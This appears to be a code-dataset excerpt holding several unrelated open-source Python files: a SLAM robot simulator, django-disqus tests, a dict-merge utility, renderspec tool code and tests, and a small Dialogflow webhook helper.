metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jesus-a-martinez-v/slam",
"score": 4
}
|
#### File: jesus-a-martinez-v/slam/Robot.py
```python
import random
# This robot lives in 2D, x-y space, and its motion is
# pointed in a random direction, initially.
# It moves in a straight line until it comes close to a wall
# at which point it stops.
#
# For measurements, it senses the x- and y-distance
# to landmarks. This is different from range and bearing as
# commonly studied in the literature, but this makes it much
# easier to implement the essentials of SLAM without
# cluttered math.
class Robot:
def __init__(self, world_size=100.0, measurement_range=30.0,
motion_noise=1.0, measurement_noise=1.0):
"""
Creates a robot with the specified parameters and initializes
the location (self.x, self.y) to the center of the world
:param world_size: World size along each dimension.
:param measurement_range: The max distance the robot is able to sense along each axis.
:param motion_noise: Motion sensor noise.
:param measurement_noise: Measurement sensor noise.
"""
self.world_size = world_size
self.measurement_range = measurement_range
self.x = world_size / 2.0
self.y = world_size / 2.0
self.motion_noise = motion_noise
self.measurement_noise = measurement_noise
self.landmarks = []
self.num_landmarks = 0
# returns a positive, random float
def _rand(self):
return random.random() * 2.0 - 1.0
# --------
# move: attempts to move robot by dx, dy. If outside world
# boundary, then the move does nothing and instead returns failure
#
def move(self, dx, dy):
"""
Attempts to move robot by dx, dy. If outside world
boundary, then the move does nothing and instead returns failure
:param dx: x-axis delta.
:param dy: y-axis delta.
:return: True if the robot were able to move, False otherwise.
"""
x = self.x + dx + (self._rand() * self.motion_noise)
y = self.y + dy + (self._rand() * self.motion_noise)
if (x < 0.0 or x > self.world_size) or (y < 0.0 or y > self.world_size):
return False
else:
self.x = x
self.y = y
return True
def sense(self):
"""
This function does not take in any parameters, instead it references internal variables
(such as self.landmarks) to measure the distance between the robot and any landmarks
that the robot can see (that are within its measurement range).
This function returns a list of landmark indices, and the measured distances (dx, dy) between the robot's
position and said landmarks.
One item in the returned list should be in the form: [landmark_index, dx, dy].
"""
all_landmarks_within_range = self.measurement_range == -1
measurements = []
for index, (landmark_x, landmark_y) in enumerate(self.landmarks):
dx = (landmark_x - self.x) + (self._rand() * self.measurement_noise)
dy = (landmark_y - self.y) + (self._rand() * self.measurement_noise)
is_landmark_within_range = (all_landmarks_within_range or
(abs(dx) <= self.measurement_range) and
(abs(dy) <= self.measurement_range))
if is_landmark_within_range:
measurements.append([index, dx, dy])
return measurements
def make_landmarks(self, num_landmarks):
"""
Makes random landmarks located in the world.
:param num_landmarks: Number of landmarks to randomly place in the world.
"""
self.landmarks = []
for i in range(num_landmarks):
self.landmarks.append([round(random.random() * self.world_size),
round(random.random() * self.world_size)])
self.num_landmarks = num_landmarks
# called when print(robot) is called; prints the robot's location
def __repr__(self):
return 'Robot: [x=%.5f y=%.5f]' % (self.x, self.y)
```
|
{
"source": "JesusAnaya/django-disqus",
"score": 2
}
|
#### File: django-disqus/disqus/tests.py
```python
import unittest
import json
import base64
import hashlib
import hmac
from django.conf import settings
if not settings.configured:
settings.configure()
from django.contrib.sites.models import Site
from django.test.utils import override_settings
from unittest import TestCase
try:
from unittest import mock
except ImportError:
import mock
from disqus.api import DisqusClient, DisqusException
from django.utils.six.moves.urllib.error import URLError
from django.utils.six.moves.urllib.parse import parse_qs, urlparse
from django.template import Context, Template
from disqus.templatetags.disqus_tags import (
set_disqus_developer,
set_disqus_identifier,
set_disqus_url,
set_disqus_title,
set_disqus_category_id,
get_config,
disqus_sso,
disqus_dev
)
class FakeRequest(object):
def __init__(self, path):
self.path = path
# mock Site
class FakeSiteManager(object):
def __init__(self, domain, name):
self.site = Site(domain=domain, name=name)
def get_current(self):
return self.site
class FakeUrlopen(mock.Mock):
def read(self, *args, **kwargs):
return '''
{
"message": [
{
"created_at": "2007-07-31 17:44:00",
"shortname": "disqus",
"description":
"The official Disqus forum. [...]",
"id": "NN", "name": "DISQUS Blog and Forum"
},
{
"created_at": "2008-09-10 14:37:31.744838",
"shortname": "antonkovalyov",
"description": "",
"id": "NN",
"name": "<NAME>"
}
],
"code": "ok",
"succeeded": true
}
'''
class FakeUrlopenNegative(mock.Mock):
def read(self, *args, **kwargs):
return '{"message":"message content","succeeded":false}'
class FakeAnonUser(mock.Mock):
def is_anonymous(self):
return True
class FakeUser(mock.Mock):
id = '1'
username = 'flin'
email = '<EMAIL>'
def is_anonymous(self):
return False
class DisqusTemplatetagsTest(TestCase):
def setUp(self):
self.real_sites_manager = Site.objects
self.context = {
'request': 'some_request',
'disqus_developer': 'some_developer',
'disqus_identifier': 'some_id',
'disqus_url': '//bestsiteever.ten',
'disqus_title': 'test title',
'disqus_category_id': 'test category'
}
def tearDown(self):
Site.objects = self.real_sites_manager
# Note: this is not tag.
def test_get_config(self):
js = get_config(self.context)
self.assertIn('var disqus_developer = "some_developer";', js)
self.assertIn('var disqus_identifier = "some_id";', js)
self.assertIn('var disqus_category_id = "test category";', js)
self.assertNotIn('var request = "some_request";', js)
self.assertEqual(len(js.split('\n')), 5)
def test_set_disqus_developer(self):
set_disqus_developer(self.context, 'Guido')
self.assertEqual(self.context['disqus_developer'], 'Guido')
def test_set_disqus_identifier(self):
set_disqus_identifier(self.context, 'spam', 'ham', 'eggs')
self.assertEqual(self.context['disqus_identifier'], 'spamhameggs')
def test_set_disqus_url(self):
set_disqus_url(self.context, 'spam', 'ham', 'eggs')
self.assertEqual(self.context['disqus_url'], 'spamhameggs')
def test_set_disqus_title(self):
set_disqus_title(self.context, 'Holy Grail')
self.assertEqual(self.context['disqus_title'], 'Holy Grail')
def test_set_disqus_category_id(self):
set_disqus_category_id(self.context, 'Monty Python')
self.assertEqual(self.context['disqus_category_id'], 'Monty Python')
@override_settings(DEBUG=True)
def test_disqus_dev_sets_full_url(self):
template = Template("""
{% load disqus_tags %}
{% disqus_dev %}
"""
)
test_domain = 'example.org'
url_path = '/path/to/page'
# mock out Site manager
Site.objects = FakeSiteManager(test_domain, 'test')
context = {'request': FakeRequest(path=url_path)}
generated_html = template.render(Context(context))
full_url = '//{}{}'.format(test_domain, url_path)
self.assertIn(full_url, generated_html)
self.assertIn('var disqus_developer = 1;', generated_html)
self.assertEqual(disqus_dev(context), {'disqus_url': full_url})
@override_settings(DEBUG=False)
def test_disqus_dev_if_debug_is_false(self):
template = Template("""
{% load disqus_tags %}
{% disqus_dev %}
"""
)
test_domain = 'example.org'
url_path = '/path/to/page'
context = {'request': FakeRequest(path=url_path)}
Site.objects = FakeSiteManager(test_domain, 'test')
generated_html = template.render(Context(context))
full_url = '//{}{}'.format(test_domain, url_path)
self.assertNotIn(full_url, generated_html)
self.assertEqual(disqus_dev(context), {})
@override_settings(DISQUS_SECRET_KEY=None, DISQUS_PUBLIC_KEY=True)
def test_disqus_sso_if_there_is_no_secret_key(self):
msg = 'You need to set DISQUS_SECRET_KEY before you can use SSO'
output = disqus_sso({})
self.assertIn(msg, output)
@override_settings(DISQUS_PUBLIC_KEY=None, DISQUS_SECRET_KEY=None)
def test_disqus_sso_if_there_is_no_public_key_and_no_secret_key(self):
msg = 'You need to set DISQUS_SECRET_KEY before you can use SSO'
output = disqus_sso({})
self.assertIn(msg, output)
@override_settings(DISQUS_PUBLIC_KEY=None, DISQUS_SECRET_KEY=True)
def test_disqus_sso_if_there_is_no_public_key(self):
msg = 'You need to set DISQUS_PUBLIC_KEY before you can use SSO'
output = disqus_sso({})
self.assertIn(msg, output)
@override_settings(DISQUS_PUBLIC_KEY=True, DISQUS_SECRET_KEY=True)
def test_disqus_sso_if_user_is_anonymous(self):
context = {'user': FakeAnonUser()}
output = disqus_sso(context)
self.assertEqual(output, '')
@mock.patch('disqus.templatetags.disqus_tags.time.time', lambda: 1420070400)
@override_settings(DISQUS_PUBLIC_KEY='a'*64, DISQUS_SECRET_KEY='b'*64)
def test_disqus_sso_if_all_inner_tests_passed(self):
t = Template("{% load disqus_tags %} {% disqus_sso %}")
user = FakeUser()
context = {'user': user}
output = t.render(Context(context))
pub_key = 'a'*64
private_key = 'b'*64
timestamp = 1420070400
data = json.dumps({
'id': user.id,
'username': user.username,
'email': user.email,
})
message = base64.b64encode(data.encode('utf-8'))
msg = ('%s %s' % (message, timestamp)).encode('utf-8')
sig = hmac.HMAC(
private_key.encode('utf-8'),
msg,
hashlib.sha1).hexdigest()
self.assertIn('disqus_config', output)
self.assertIn('remote_auth_s3', output)
self.assertIn(message.decode('utf-8'), output)
self.assertIn(sig, output)
self.assertIn(str(timestamp), output)
self.assertIn('api_key = "{}"'.format(pub_key), output)
def test_disqus_num_replies_without_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_num_replies %}")
t2 = Template("""{% load disqus_tags %}
{% disqus_num_replies 'foobar' %}""")
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = '';", render1)
self.assertIn("var disqus_shortname = 'foobar';", render2)
self.assertIn('var disqus_developer = "some_developer";', render2)
self.assertIn('var disqus_url = "//bestsiteever.ten";', render2)
@override_settings(DISQUS_WEBSITE_SHORTNAME='best_test_site_ever')
def test_disqus_num_replies_with_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_show_comments %}")
t2 = Template("""{% load disqus_tags %}
{% disqus_show_comments 'foobar' %}""")
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render1)
self.assertNotIn("var disqus_shortname = 'foobar';", render1)
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render2)
self.assertIn('var disqus_identifier = "some_id";', render2)
self.assertIn('var disqus_title = "test title";', render2)
def test_disqus_recent_comments_without_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_recent_comments %}")
t2 = Template("{% load disqus_tags %} \
{% disqus_recent_comments shortname='foobar' \
num_items=7 \
excerpt_length=400 \
hide_avatars=1 \
avatar_size=50 %}"
)
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = '';", render1)
self.assertIn("num_items=5", render1)
self.assertIn("excerpt_length=200", render1)
self.assertIn("hide_avatars=0", render1)
self.assertIn("avatar_size=32", render1)
self.assertIn("var disqus_shortname = 'foobar';", render2)
self.assertIn("num_items=7", render2)
self.assertIn("excerpt_length=400", render2)
self.assertIn("hide_avatars=1", render2)
self.assertIn("avatar_size=50", render2)
self.assertIn('var disqus_category_id = "test category";', render2)
self.assertIn('var disqus_url = "//bestsiteever.ten";', render2)
@override_settings(DISQUS_WEBSITE_SHORTNAME='best_test_site_ever')
def test_disqus_recent_comments_with_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_recent_comments %}")
t2 = Template("{% load disqus_tags %} \
{% disqus_recent_comments shortname='foobar' \
num_items=7 \
excerpt_length=400 \
hide_avatars=1 \
avatar_size=50 %}"
)
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render1)
self.assertIn("num_items=5", render1)
self.assertIn("excerpt_length=200", render1)
self.assertIn("hide_avatars=0", render1)
self.assertIn("avatar_size=32", render1)
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render2)
self.assertIn("num_items=7", render2)
self.assertIn("excerpt_length=400", render2)
self.assertIn("hide_avatars=1", render2)
self.assertIn("avatar_size=50", render2)
self.assertIn('var disqus_category_id = "test category";', render2)
self.assertIn('var disqus_url = "//bestsiteever.ten";', render2)
def test_disqus_show_comments_without_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_show_comments %}")
t2 = Template("""{% load disqus_tags %}
{% disqus_show_comments 'foobar' %}""")
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = '';", render1)
self.assertIn("var disqus_shortname = 'foobar';", render2)
self.assertIn('var disqus_developer = "some_developer";', render2)
self.assertIn('var disqus_url = "//bestsiteever.ten";', render2)
@override_settings(DISQUS_WEBSITE_SHORTNAME='best_test_site_ever')
def test_disqus_show_comments_with_settings(self):
t1 = Template("{% load disqus_tags %} {% disqus_show_comments %}")
t2 = Template("""{% load disqus_tags %}
{% disqus_show_comments 'foobar' %}""")
render1 = t1.render(Context({}))
render2 = t2.render(Context(self.context))
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render1)
self.assertNotIn("var disqus_shortname = 'foobar';", render1)
self.assertIn("var disqus_shortname = 'best_test_site_ever';", render2)
self.assertIn('var disqus_identifier = "some_id";', render2)
self.assertIn('var disqus_title = "test title";', render2)
class DisqusClientTest(TestCase):
def setUp(self):
self.client = DisqusClient()
self.attr = {'user_api_key': 'spam', 'developer_api_key': 'ham'}
def test_init_properly(self):
"""
First, we test if the DisqusClient class can be initialized
and parameters that were passed are set correctly.
"""
c = DisqusClient(foo='bar', bar='foo')
self.assertEqual('bar', c.foo)
self.assertEqual('foo', c.bar)
with self.assertRaises(AttributeError):
c.baz
# XXX bug or feature?
def test_init_if_passed_args_with_name_like_in_METHODS(self):
c = DisqusClient(**DisqusClient.METHODS)
with self.assertRaises(TypeError):
# str is not callable
getattr(c, 'get_thread_list')()
with self.assertRaises(TypeError):
getattr(c, 'get_forum_posts')()
with self.assertRaises(TypeError):
getattr(c, 'moderate_post')()
@mock.patch('disqus.api.DisqusClient.call')
def test_call_method_is_triggered_by_api_methods_from_METHODS(self,
call_mock):
call = getattr(self.client, 'get_user_name')
call(**self.attr)
call_mock.assert_called_with('get_user_name', **self.attr)
call = getattr(self.client, 'get_num_posts')
call(**self.attr)
call_mock.assert_called_with('get_num_posts', **self.attr)
call = getattr(self.client, 'get_thread_by_url')
call(**self.attr)
call_mock.assert_called_with('get_thread_by_url', **self.attr)
@mock.patch('disqus.api.urlopen', new_callable=FakeUrlopen)
@mock.patch('disqus.api.DisqusClient._get_request')
def test__get_request_is_triggered_by_call_method(self,
_get_request_mock,
urlopen_mock):
for method in DisqusClient.METHODS:
url = self.client.api_url % method
call = getattr(self.client, method)
call(**self.attr)
_get_request_mock.assert_called_with(
url, self.client.METHODS[method],
**self.attr)
@mock.patch('disqus.api.urlopen', new_callable=FakeUrlopen)
def test_call_method_if_requst_is_succeeded(self, urlopen_mock):
rest_response = '''
{
"message": [
{
"created_at": "2007-07-31 17:44:00",
"shortname": "disqus",
"description":
"The official Disqus forum. [...]",
"id": "NN", "name": "DISQUS Blog and Forum"
},
{
"created_at": "2008-09-10 14:37:31.744838",
"shortname": "antonkovalyov",
"description": "",
"id": "NN",
"name": "<NAME>"
}
],
"code": "ok",
"succeeded": true
}
'''
response_json = json.loads(rest_response)
message = response_json['message']
response = self.client.get_forum_list(user_api_key='spam')
self.assertEqual(response, message)
@mock.patch('disqus.api.urlopen',
new_callable=FakeUrlopenNegative)
def test_call_method_if_requst_is_not_succeeded(self, urlopen_mock):
with self.assertRaises(DisqusException):
self.client.get_forum_list()
@mock.patch('disqus.api.DisqusClient._get_request')
def test_call_method_if_during_request_error_occurred(self,
_get_request_mock):
with self.assertRaises(URLError):
self.client.create_post()
def test__get_request_if_http_method_is_get(self):
attr_ = {'user_api_key': ['spam'],
'developer_api_key': ['ham'],
'api_version': ['1.1']
}
for api_method, http_method in DisqusClient.METHODS.items():
if http_method == "GET":
url = self.client.api_url % api_method
request_params = self.client._get_request(
url, http_method,
**self.attr)
request_no_params = self.client._get_request(url, http_method)
self.assertEqual(request_params.get_host(), 'disqus.com')
self.assertEqual(request_no_params.get_host(), 'disqus.com')
# check actual request method
self.assertEqual(request_params.get_method(), http_method)
self.assertEqual(request_no_params.get_method(), http_method)
# getting url's query string
# since parameters passed to api_url from a dict, mean randomly
url_parsed1 = urlparse(request_params.get_full_url())
qs_params = parse_qs(url_parsed1.query)
url_parsed2 = urlparse(request_no_params.get_full_url())
qs_no_params = parse_qs(url_parsed2.query)
self.assertEqual(qs_params, attr_)
# hardcoded in api_url
self.assertEqual(qs_no_params, {'api_version': ['1.1']})
def test__get_request_if_http_method_is_post(self):
attr_ = {'user_api_key': ['spam'], 'developer_api_key': ['ham']}
for api_method, http_method in DisqusClient.METHODS.items():
if http_method == "POST":
url = self.client.api_url % api_method
request_params = self.client._get_request(url,
http_method,
**self.attr)
request_no_params = self.client._get_request(url, http_method)
self.assertEqual(request_params.get_host(), 'disqus.com')
self.assertEqual(request_no_params.get_host(), 'disqus.com')
self.assertEqual(request_params.get_method(), http_method)
self.assertEqual(request_no_params.get_method(), http_method)
qs_params = parse_qs(request_params.data)
qs_no_params = parse_qs(request_no_params.data)
self.assertEqual(qs_params, attr_)
self.assertEqual(qs_no_params, {})
# XXX maybe exception must be raised explicitly (DisqusException)
def test__get_request_if_http_method_is_not_post_or_get(self):
url1 = self.client.api_url % 'get_forum_api_key'
url2 = self.client.api_url % 'create_post'
url3 = self.client.api_url % 'foobar'
with self.assertRaises(UnboundLocalError):
self.client._get_request(url1, 'PUSH', **self.attr)
with self.assertRaises(UnboundLocalError):
self.client._get_request(url1, 'PUSH')
with self.assertRaises(UnboundLocalError):
self.client._get_request(url2, 'PUSH', **self.attr)
with self.assertRaises(UnboundLocalError):
self.client._get_request(url2, 'PUSH')
with self.assertRaises(UnboundLocalError):
self.client._get_request(url3, 'PUSH', **self.attr)
with self.assertRaises(UnboundLocalError):
self.client._get_request(url3, 'PUSH')
# XXX Don't know how to implement this and if should.
def test_call_method_if_api_version_passed_as_method_argument(self):
pass
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "JesusAnaya/geodjango-gmaps-widget",
"score": 3
}
|
#### File: geodjango-gmaps-widget/geodjango_gmaps_widget/utils.py
```python
import collections
def dict_update(target_dict, *update_list):
for u in update_list:
if hasattr(u, 'iteritems'):
for k, v in u.iteritems():
if isinstance(v, collections.Mapping):
r = dict_update(target_dict.get(k, {}), v)
target_dict[k] = r
else:
target_dict[k] = u[k]
return target_dict
def class_to_dict(cls):
return dict([(k, getattr(cls, k)) for k in dir(cls)
if not k.startswith('_')])
```
|
{
"source": "jesusaurus/obs-service-renderspec",
"score": 2
}
|
#### File: obs-service-renderspec/tests/test_base.py
```python
from __future__ import unicode_literals
import imp
import mock
import os
import shutil
import subprocess
import sys
import tempfile
import unittest
# NOTE(toabctl): Hack to import non-module file for testing
sv = imp.load_source("renderspec", "renderspec")
RENDERSPEC_EXECUTABLE = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../', 'renderspec')
)
class RenderspecBaseTest(unittest.TestCase):
"""Basic test class. Other tests should use this one"""
def setUp(self):
self._tmpdir = tempfile.mkdtemp(prefix='obs-service-renderspec-test-')
os.chdir(self._tmpdir)
def _run_renderspec(self, params=[]):
self._tmpoutdir = tempfile.mkdtemp(
prefix='obs-service-renderspec-test-outdir-')
cmd = [sys.executable,
RENDERSPEC_EXECUTABLE,
'--outdir', self._tmpoutdir] + params
try:
subprocess.check_output(
cmd, stderr=subprocess.STDOUT, env=os.environ.copy())
for f in os.listdir(self._tmpoutdir):
os.unlink(self._tmpdir+"/"+f)
# FIXME: in most modes the files get not replaced,
# but store in parallel with _service: prefix
shutil.move(self._tmpoutdir+"/"+f, self._tmpdir)
shutil.rmtree(self._tmpoutdir)
except subprocess.CalledProcessError as e:
raise Exception(
"Can not call '%s' in dir '%s'. Error: %s" % (" ".join(cmd),
self._tmpdir,
e.output))
def tearDown(self):
shutil.rmtree(self._tmpdir)
class RenderspecBasics(RenderspecBaseTest):
# patch1 content and corresponding sha256
P1_CONTENT = 'foo'
P1_SHA = '2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
def _write_patch(self, content, name):
with open(os.path.join(self._tmpdir, name), 'w+') as f:
f.write(content)
def _write_template(self, name, patches=[]):
"""write a template which can be rendered"""
with open(os.path.join(self._tmpdir, name), 'w+') as f:
f.write("""
Name: test
License: Apache-2.0
Version: 1.1.0
Release: 0
Summary: test summary
{patches}
Requires: {{{{ py2pkg("oslo.log") }}}}
%description
test description.
""".format(patches="\n".join(patches)))
def test_help(self):
self._run_renderspec(['-h'])
def test_render(self):
self._write_template('template.spec.j2')
self._run_renderspec(['--input-template', 'template.spec.j2'])
@mock.patch('renderspec._get_changelog_github', return_value=['l1', 'l2'])
def test__get_changelog(self, mock_changelog_github):
changes = sv._get_changelog('gh,openSUSE,obs-service-renderspec',
'1.1.0', '2.2.0')
self.assertEqual(changes, ['l1', 'l2'])
def test__get_changelog_invalid_provider(self):
with self.assertRaises(Exception):
sv._get_changelog('foo,openSUSE,obs-service-renderspec',
'1.1.0', '2.2.0')
def test__get_changes_string_no_changes(self):
s = sv._get_changes_string([], '<EMAIL>')
self.assertEqual(s, None)
s = sv._get_changes_string(None, '<EMAIL>')
self.assertEqual(s, None)
@mock.patch('renderspec._get_changes_datetime',
return_value='Mon Oct 17 05:22:25 UTC 2016')
def test__get_changes_string(self, mock_utcnow):
s = sv._get_changes_string(['l1', ['l2', 'l3'], 'l4'],
'<EMAIL>')
expected = """-------------------------------------------------------------------
Mon Oct 17 05:22:25 UTC 2016 - <EMAIL>
- l1
- l2
- l3
- l4
"""
self.assertEqual(s, expected)
def test__prepend_string_to_file(self):
fn = os.path.join(self._tmpdir, 'prepentd_string_test1')
with open(fn, 'w') as f:
f.write('a line')
sv._prepend_string_to_file('你好', fn)
def test__extract_archive_to_tempdir_no_file(self):
with self.assertRaises(Exception) as e_info:
with sv._extract_archive_to_tempdir("foobar"):
self.assertIn("foobar", str(e_info))
def _write_pbr_json(self, destdir, git_version='6119f6f'):
"""write a pbr.json file into destdir"""
f1 = os.path.join(destdir, 'pbr.json')
with open(f1, 'w+') as f:
f.write('{"git_version": "%s", "is_release": false}' % git_version)
def test__find_pbr_json(self):
tmpdir = tempfile.mkdtemp(prefix='obs-service-renderspec-test_')
try:
self._write_pbr_json(tmpdir)
self.assertEqual(
sv._find_pbr_json(tmpdir),
os.path.join(tmpdir, 'pbr.json')
)
finally:
shutil.rmtree(tmpdir)
def test__get_patch_sha256_from_patchname(self):
patch_name = 'fix1.patch'
self._write_patch(RenderspecBasics.P1_CONTENT, patch_name)
sha = sv._get_patch_sha256_from_patchname(patch_name)
self.assertEqual(sha, RenderspecBasics.P1_SHA)
def test__get_patch_sha256_from_patchname_not_available(self):
"""test when no patch file for the given name is available"""
sha = sv._get_patch_sha256_from_patchname('not-there-patch')
self.assertEqual(sha, None)
def test__get_patch_names_from_spec(self):
patches = ['Patch0: fix1.patch',
'Patch1:fix2.patch',
'Patch100: fix3.patch # comment',
'Patch101: fix4.patch']
# create template and render it so we can get patches from the .spec
self._write_template('template.spec.j2', patches=patches)
self._run_renderspec(['--input-template', 'template.spec.j2'])
patches = sv._get_patch_names_from_spec('template.spec')
self.assertEqual(patches, [
('Patch0', 'fix1.patch'),
('Patch1', 'fix2.patch'),
('Patch100', 'fix3.patch'),
('Patch101', 'fix4.patch'),
])
def test__get_patches(self):
patch_name = 'fix1.patch'
self._write_patch(RenderspecBasics.P1_CONTENT, patch_name)
patches = ['Patch0: {}'.format(patch_name)]
self._write_template('template.spec.j2', patches=patches)
self._run_renderspec(['--input-template', 'template.spec.j2'])
p = sv._get_patches('template.spec')
self.assertEqual(p, {'fix1.patch': RenderspecBasics.P1_SHA})
def test__get_patches_changes_no_patches(self):
changes = sv._get_patches_changes({}, {})
self.assertEqual(changes, {'added': [], 'removed': [], 'updated': []})
def test__get_patches_changes_no_changes(self):
changes = sv._get_patches_changes(
{'fix1.patch': 'sha1111'},
{'fix1.patch': 'sha1111'}
)
self.assertEqual(changes, {'added': [], 'removed': [], 'updated': []})
def test__get_patches_changes_patch_added(self):
changes = sv._get_patches_changes(
{'fix1.patch': 'sha1111'},
{'fix1.patch': 'sha1111', 'fix2.patch': 'sha2222'}
)
self.assertEqual(changes, {'added': ['fix2.patch'],
'removed': [],
'updated': []})
def test__get_patches_changes_patch_removed(self):
changes = sv._get_patches_changes(
{'fix1.patch': 'sha1111', 'fix2.patch': 'sha2222'},
{'fix1.patch': 'sha1111'}
)
self.assertEqual(changes, {'added': [],
'removed': ['fix2.patch'],
'updated': []})
def test__get_patches_changelog_patch_added_and_removed(self):
changes = sv._get_patches_changes(
{'fix1.patch': 'sha1111'},
{'fix2.patch': 'sha2222'}
)
self.assertEqual(changes, {'added': ['fix2.patch'],
'removed': ['fix1.patch'],
'updated': []})
def test__get_patches_changes_patch_updated(self):
changes = sv._get_patches_changes(
{'fix1.patch': 'sha1111'},
{'fix1.patch': 'sha2222'}
)
self.assertEqual(changes, {'added': [],
'removed': [],
'updated': ['fix1.patch']})
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jesusaurus/renderspec",
"score": 2
}
|
#### File: renderspec/renderspec/__init__.py
```python
from __future__ import print_function
import argparse
import os
import platform
import string
import sys
from jinja2 import Environment
import yaml
from renderspec.distloader import RenderspecLoader
from renderspec import versions
from renderspec import contextfuncs
def generate_spec(spec_style, epochs, requirements, skip_pyversion,
input_template_format, input_template_path, output_path):
"""generate a spec file with the given style and input template"""
if input_template_format == 'spec.j2':
return _renderer_input_template_format_spec(
spec_style, epochs, requirements, skip_pyversion,
input_template_path, output_path)
else:
raise Exception('Unknown input-template-format "%s"' %
input_template_format)
def _renderer_input_template_format_spec(spec_style, epochs, requirements,
skip_pyversion,
input_template_path, output_path):
"""render a 'traditional' .spec.j2 template into a .spec file"""
env = Environment(loader=RenderspecLoader(
template_fn=input_template_path),
trim_blocks=True)
contextfuncs.env_register_filters_and_globals(env)
template_name = '.spec'
if spec_style in env.loader.list_templates():
template_name = spec_style
template = env.get_template(template_name)
input_template_dir = os.path.dirname(os.path.abspath(input_template_path))
if output_path:
output_dir = os.path.dirname(
os.path.abspath(output_path))
else:
output_dir = None
return template.render(spec_style=spec_style, epochs=epochs,
requirements=requirements,
skip_pyversion=skip_pyversion,
input_template_dir=input_template_dir,
output_dir=output_dir)
def _is_fedora(distname):
"""detect Fedora-based distro (e.g Fedora, CentOS, RHEL)"""
distname = distname.lower()
for x in ["fedora", "centos", "red hat"]:
if x in distname:
return True
return False
def _get_default_distro():
distname, _, _ = platform.linux_distribution()
# newer distros only have /etc/os-release and then platform doesn't work
# anymore and upstream does not want to fix it:
# https://bugs.python.org/issue1322
if not distname and 'Linux' in platform.system():
try:
with open('/etc/os-release', 'r') as lsb_release:
for l in lsb_release:
if l.startswith('ID_LIKE='):
distname = l.partition('=')[2].strip(
string.punctuation + string.whitespace)
break
except OSError:
print('WARN: Unable to determine Linux distribution')
if "suse" in distname.lower():
return "suse"
elif _is_fedora(distname):
return "fedora"
else:
return "unknown"
def _get_default_pyskips(distro):
# py3 building is all complicated on CentOS 7.x
if distro == 'fedora':
distname, distver, _ = platform.linux_distribution()
if 'CentOS' in distname and distver.startswith('7'):
return 'py3'
return None
def _get_default_template():
fns = [f for f in os.listdir('.')
if os.path.isfile(f) and f.endswith('.spec.j2')]
if not fns:
return None, ("No *.spec.j2 templates found. "
"See `renderspec -h` for usage.")
elif len(fns) > 1:
return None, ("Multiple *.spec.j2 templates found, "
"please specify one.\n"
"See `renderspec -h` for usage.")
else:
return fns[0], None
def _get_epochs(filename):
"""get a dictionary with pkg-name->epoch mapping"""
epochs = {}
if filename is not None:
with open(filename, 'r') as f:
data = yaml.safe_load(f.read())
epochs.update(data['epochs'])
return epochs
def _get_requirements(filenames):
"""get a dictionary with pkg-name->min-version mapping"""
reqs = {}
for filename in filenames:
with open(filename, 'r') as f:
reqs.update(versions.get_requirements(f.readlines()))
return reqs
def process_args():
distro = _get_default_distro()
parser = argparse.ArgumentParser(
description="Convert a .spec.j2 template into a .spec")
parser.add_argument("-o", "--output",
help="output filename or '-' for stdout. "
"default: autodetect")
parser.add_argument("--spec-style", help="distro style you want to use. "
"default: %s" % (distro), default=distro,
choices=['suse', 'fedora'])
parser.add_argument("--skip-pyversion",
help='Skip requirements for this pyversion',
default=_get_default_pyskips(distro),
choices=['py2', 'py3'])
parser.add_argument("--epochs", help="yaml file with epochs listed.")
parser.add_argument("input-template", nargs='?',
help="specfile jinja2 template to render. "
"default: *.spec.j2")
parser.add_argument("-f", "--input-template-format", help="Format of the "
"input-template file. default: %(default)s",
default="spec.j2", choices=["spec.j2"])
parser.add_argument("--requirements", help="file(s) which contain "
"PEP0508 compatible requirement lines. Last mentioned "
"file has highest priority. default: %(default)s",
action='append', default=[])
return vars(parser.parse_args())
def main():
args = process_args()
# autodetect input/output fns if possible
input_template = args['input-template']
if not input_template:
input_template, errmsg = _get_default_template()
if not input_template:
print(errmsg)
return 1
output_filename = args['output']
if not output_filename:
if not input_template.endswith('.spec.j2'):
print("Failed to autodetect output file name. "
"Please specify using `-o/--output`.")
return 2
output_filename, _, _ = input_template.rpartition('.')
try:
epochs = _get_epochs(args['epochs'])
requirements = _get_requirements(args['requirements'])
except IOError as e:
print(e)
return 3
if output_filename and output_filename != '-':
output_path = os.path.abspath(output_filename)
else:
output_path = None
spec = generate_spec(args['spec_style'], epochs, requirements,
args['skip_pyversion'],
args['input_template_format'],
input_template, output_path)
if output_path:
print("Rendering: %s -> %s" % (input_template, output_path))
with open(output_path, "w") as o:
o.write(spec)
else:
print(spec)
return 0
if __name__ == '__main__':
sys.exit(main())
```
|
{
"source": "jesusavf/pythonlibfordialogflow",
"score": 3
}
|
#### File: jesusavf/pythonlibfordialogflow/lib.py
```python
from flask import Flask, request, make_response, jsonify
import random
def msj(text):
return '{"fulfillmentText": "'+text+'", "fulfillmentMessages": [ { "text": { "text": [ "'+text+'" ] } } ]}'
def rndmsj(textx):
text=random.choice(textx)
return '{"fulfillmentText": "'+text+'", "fulfillmentMessages": [ { "text": { "text": [ "'+text+'" ] } } ]}'
def credenciales(user,passw,vuno,vdos):
if user==vuno:
if passw==vdos:
return True
else:
exit()
else:
exit()
def instancia(nombre):
req = request.get_json(force=True)
if req.get('queryResult').get('intent').get('displayName')==nombre:
return True
else:
return False
def acciones():
req = request.get_json(force=True)
if req.get('queryResult').get('action'):
return req.get('queryResult').get('action')
else:
return ''
